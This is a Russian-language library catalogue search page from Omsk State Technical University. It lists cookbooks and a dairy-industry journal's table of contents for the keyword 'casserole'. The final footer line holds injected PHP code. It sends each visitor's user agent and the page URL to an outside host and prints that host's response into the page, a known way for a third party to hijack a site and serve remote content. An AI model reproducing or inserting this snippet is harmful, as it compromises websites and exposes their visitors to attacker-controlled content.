Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

306 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ЗАПЕКАНКА")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 6
1. 
Рыбные блюда [Текст] / дар. В. А. Козлова, 1996. - 415 с.
Держатели документа (Информация об экземплярах) 
2. 
Молочная промышленность. - Журнал, 2010г. № 7
Оглавление 
  • Радаева, И. А. Ведущие ученые отрасли: Богданов Вячеслав Михайлович / И. А. Радаева. - с.80
  • К юбилею ведущего маслодела России. - с.74-75
  • Дунченко, Н. И. Научно-исследовательская работа - одна из основных составляющих подготовки магистров / Н. И. Дунченко, Л. В. Калинина, А. В. Ионов. - с.72-73
  • Пасько, О. В. Социальная значимость и экономическая эффективность технологий ферментированных продуктов / О. В. Пасько. - с.70-71
  • Быстрозамороженная творожная запеканка. - с.69
  • Степанов, К. М. Якутские национальные кисломолочные продукты нового поколения / К. М. Степанов, В. Т. Васильева. - с.68
  • Глаголева, Л. Э. Формы связи влаги в продуктах на творожной основе / Л. Э. Глаголева, Н. Ю. Черноусова, Л. С. Просвирина. - с.66-67
  • Количество в кефире полисахарида, производимого молочнокислыми бактериями. - с.64-65
  • Ермолаев, В. А. Вакуумное концентрирование молочно-белковых продуктов / В. А. Ермолаев. - с.62-63
  • Красноштанова, А. А. Молекулярное распределение белков при ультраконцентрировании сыворотки / А. А. Красноштанова, В. Г. Попов, О. В. Рытченкова. - с.60-61
  • Гиринович, О. А. Семинар "ЭФКО": фокус на творожную продукцию / О. А. Гиринович. - с.58-59
  • Смирнова, И. А. Молочно-белковый концентрат / И. А. Смирнова, В. Н. Печерина. - с.57
  • Мельникова, Е. И. Имитатор молочного жира для синбиотических продуктов / Е. И. Мельникова, Е. Б. Станиславская, Н. А. Подгорный. - с.55-56
  • Куликова, И. К. Кисломолочный напиток смешанного брожения / И. К. Куликова, И. А. Евдокимов, М. А. Гашева. - с.53-54
  • Тагатозосодержащий подсластитель. - с.52
  • Кравченко, Э. Ф. Белковые структурообразователи - загустители / Э. Ф. Кравченко, В. П. Захлестных. - с.51
  • Евелева, В. В. Добавки для йогурта / В. В. Евелева, А. Л. Рублев, Л. А. Забодалова. - с.48-50
  • Соколенко, Г. Г. Сывороточный квас с экстрактом амаранта / Г. Г. Соколенко, К. К. Полянский, Т. В. Вострикова. - с.46-47
  • Электродиализные установки для переработки молочной сыворотки. - с.45
  • Бурцев, Д. Г. Концентрат "КПС - лакт" / Д. Г. Бурцев, А. Д. Лодыгин. - с.44
  • Бурцев, Д. Г. Бифидогенный концентрат "Лактобел" / Д. Г. Бурцев, В. Н. Чернобаев. - с.43
  • Дудникова, О. А. Липидно-белковый концентрат / О. А. Дудникова, А. Д. Лодыгин, А. Г. Храмцов. - с.42-43
  • Храмцов, А. Г. Модернизация молочного дела: продвижение инновационных приоритетов / А. Г. Храмцов. - с.38-41
  • Комментарии к Типовой технологической инструкции по стандарту на молоко и сливки сгущенные с сахаром. - с.34-36
  • Пасько, О. В. Активизация роста и защиты культур с пробиотическими свойствами / О. В. Пасько. - с.31-32
  • Арсеньева, Т. П. К чему приводит лактазная недостаточность / Т. П. Арсеньева. - с.28-30
  • Хамагаева, И. С. Внеклкеточные метаболиты, синтезируемые пробиотическими микроорганизмами / И. С. Хамагаева, С. Б. Тумунова, Н. А. Замбалова. - с.27
  • Влияние лактитола на сквашивание и антагонистическую активность молочнокислых микроорганизмов. - с.24-26
  • Производители "Бифилайф" - лидеры молочной промышленности. - с.23
  • Ефимочкина, Н. Р. Возбудители пищевых зоонозов / Н. Р. Ефимочкина. - с.20-22
  • В помощь микробиологу. - с.18
  • Миллер, М. "Прозрачное молоко" на предприятии TNUVA / М. Миллер, М. Полыновская. - с.16-17
  • Имидж розничных сетей России глазами покупателей. - с.13-14
  • Быковская, Г. В. Как можно стабилизировать цены на молоко / Г. В. Быковская. - с.9-12
  • Потенциальные возможности и перспективы развития рынка молока и молочных продуктов в России. - с.6-8
Держатели документа (Информация об экземплярах) 
3. 
Кулинарные рецепты: Из "Книги о вкусной и здоровой пище" [Текст] / сост. Л. И. Воробьева ; дар.: Л. К. Жарина, Л. К. Жарина, 1988. - 334, [1] с.
Ключевые слова 
ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ИКРА -- ПАШТЕТ -- СОУС -- МАЙОНЕЗ -- БУЛЬОН -- СУП -- ОКРОШКА -- МЯСО -- КОТЛЕТА -- ТЕФТЕЛИ -- ШНИЦЕЛЬ -- ПЕЛЬМЕНИ -- КУРИЦА -- ДИЧЬ -- РЫБА -- МОРЕПРОДУКТ -- ТВОРОЖНИКИ -- ВАРЕНИК -- БЛИНЧИКИ -- ЗАПЕКАНКА -- ПУДИНГ -- ОМЛЕТ -- ОВОЩИ -- ГРИБЫ -- КАРТОФЕЛЬ -- ФОРШМАК -- КАША -- ПЛОВ -- КЛЕЦКИ -- ЧЕБУРЕК -- КУКУРУЗА -- ФАСОЛЬ -- ГОРОХ -- ЧЕЧЕВИЦА -- ПИРОЖОК -- ВАТРУШКА -- БУЛКА -- ОЛАДЬИ -- РУЛЕТ -- ПИРОЖНОЕ -- ТОРТ -- КЕКС -- ПОНЧИК -- ХВОРОСТ -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- МУСС -- КРЕМ -- ПУДИНГ -- ШАРЛОТКА -- МАРИНАД -- СОЛЕНЬЕ -- МАРИНАД -- КОНСЕРВИРОВАНИЕ -- ЗАМОРАЖИВАНИЕ -- ЯГОДЫ
Держатели документа (Информация об экземплярах) 
4. 
Микроволновая кухня каждый день [Текст] / сост. Ю. Р. Васильев ; дар. И. Ю. Морозов, 1995. - 383 с.
Держатели документа (Информация об экземплярах) 
5. 
Сидорина Е. И. Современная кухня [Текст] : кулинар. рецепты из доступ. продуктов / Е. И. Сидорина, 1993. - 543 с.
Ключевые слова 
СЕРВИРОВКА СТОЛА -- ЗАКУСКА ХОЛОДНАЯ -- САЛАТ -- ВИНЕГРЕТ -- ПАШТЕТ -- ЗАЛИВНОЕ -- БУТЕРБРОД -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ РЫБЫ -- СЫР -- БЛЮДА ИЗ ЯИЦ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СУП ОВОЩНОЙ -- УХА -- СУП МОЛОЧНЫЙ -- СУП ГРИБНОЙ -- БЛИНЫ -- ОЛАДЬИ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- ЗАПЕКАНКА -- ПЛОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- СОУС -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО СЛОЕНОЕ -- ТОРТЫ -- ТЕСТО БИСКВИТНОЕ -- ПЕЧЕНЬЕ -- ХВОРОСТ -- ВАФЛИ -- КЕКС -- ПИРОГ -- КРЕМ МАСЛЯНЫЙ -- КРЕМ БЕЛКОВЫЙ -- КРЕМ ЗАВАРНОЙ -- МУСС -- ЖЕЛЕ -- КОМПОТ -- КИСЕЛЬ -- БЛЮДА СЛАДКИЕ -- ЗАГОТОВКИ -- КАПУСТА КВАШЕНАЯ -- КОНСЕРВИРОВАНИЕ -- МАРИНОВАНИЕ -- ВАРЕНЬЕ -- ДЖЕМ -- ЦУКАТЫ
6. 
Киселева, Вера Борисовна. Детская кухня [Текст] : Кн. для матерей о приготовлении пищи детям / В. Б. Киселева; В. С. Вайль, 1958. - 175 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3215 - 29.03.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.13 с.14 запросов, 1.59c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;